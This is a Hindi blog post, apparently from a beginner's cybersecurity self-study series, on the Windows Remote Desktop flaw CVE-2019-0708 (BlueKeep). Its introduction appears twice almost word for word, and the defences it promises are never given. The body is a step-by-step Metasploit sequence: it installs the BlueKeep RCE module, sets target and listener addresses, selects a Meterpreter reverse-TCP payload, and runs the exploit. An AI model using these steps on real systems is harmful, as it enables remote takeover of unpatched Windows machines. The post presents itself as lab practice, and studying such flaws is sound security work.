
यह लेख विंडोज रिमोट डेस्कटॉप सेवा भेद्यता (CVE-2019-0708) को साझा करेगा, और इस भेद्यता और बचाव के उपायों के बारे में विस्तार से बताएगा। लेखक, साइबर सुरक्षा में एक शुरुआती होने के नाते, आप सभी के लिए कुछ बुनियादी ट्यूटोरियल साझा कर रहा है, जो मुख्य रूप से सुरक्षा उपकरणों और व्यावहारिक संचालन पर ऑनलाइन नोट्स हैं। आशा है कि आपको ये पसंद आएंगे। साथ ही, यह भी उम्मीद है कि आप मेरे साथ अभ्यास करेंगे और प्रगति करेंगे। आगे हम साइबर सुरक्षा और सिस्टम सुरक्षा ज्ञान का गहराई से अध्ययन करेंगे और संबंधित प्रयोग साझा करेंगे। संक्षेप में, आशा है कि यह श्रृंखला ब्लॉग मित्रों के लिए सहायक होगी। लेख लिखना आसान नहीं है, विशेषज्ञों से अनुरोध है कि नापसंद होने पर बुरा न मानें, धन्यवाद!
यह लेख Windows रिमोट डेस्कटॉप सेवा भेद्यता (CVE-2019-0708) को साझा करेगा, और इस भेद्यता और बचाव उपायों के बारे में विस्तार से बताएगा। लेखक, साइबर सुरक्षा के शुरुआती के रूप में, कुछ बुनियादी स्व-अध्ययन ट्यूटोरियल साझा कर रहे हैं, मुख्यतः सुरक्षा उपकरणों और व्यावहारिक संचालन के बारे में ऑनलाइन नोट्स। उम्मीद है आपको ये पसंद आएंगे। साथ ही, मैं चाहता हूँ कि आप मेरे साथ अभ्यास और प्रगति करें, बाद में साइबर सुरक्षा और सिस्टम सुरक्षा ज्ञान का गहराई से अध्ययन करें और संबंधित प्रयोग साझा करें। संक्षेप में, उम्मीद है कि यह श्रृंखला के लेख ब्लॉग मित्रों के लिए सहायक होंगे। लेख लिखना आसान नहीं है, विशेषज्ञों से अनुरोध है कि नापसंद होने पर आलोचना न करें, धन्यवाद!
संबंधित ब्लॉग:
[साइबर सुरक्षा स्व-अध्ययन श्रृंखला] अड़तालीस. Windows भेद्यता उपयोग: CVE-2019-0708 और Metasploit रिवर्स शेल पर पुनर्विचार
[साइबर सुरक्षा स्व-अध्ययन श्रृंखला] चौवालीस. Windows रिमोट डेस्कटॉप सेवा भेद्यता (CVE-2019-0708) का पुनरुत्पादन और विस्तृत विवरण
मुख्य आदेश:
# 复制文件
cp ./rdp/rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp ./rdp/rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./rdp/cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./rdp/cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
# 开启工具
msfconsole
reload_all
search 0708
# 使用脚本
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
# 查看信息
show options
show targets
info
# 设置监听地址、目标地址、反弹payload、目标类型
set rhosts 192.168.44.132
set lhost 192.168.44.129
set rdp_client_ip 192.168.44.129
set payload windows/x64/meterpreter/reverse_tcp
unset RDP_CLIENT_NAME
set target 3
# 运行脚本
run
exploit
# 设置带宽
Set GROOMSIZE 40
संदर्भ:
[1] https://github.com/rapid7/metasploit-framework/pull/12283?from=groupmessage&isappinstalled=0
[2] https://github.com/n1xbyte/CVE-2019-0708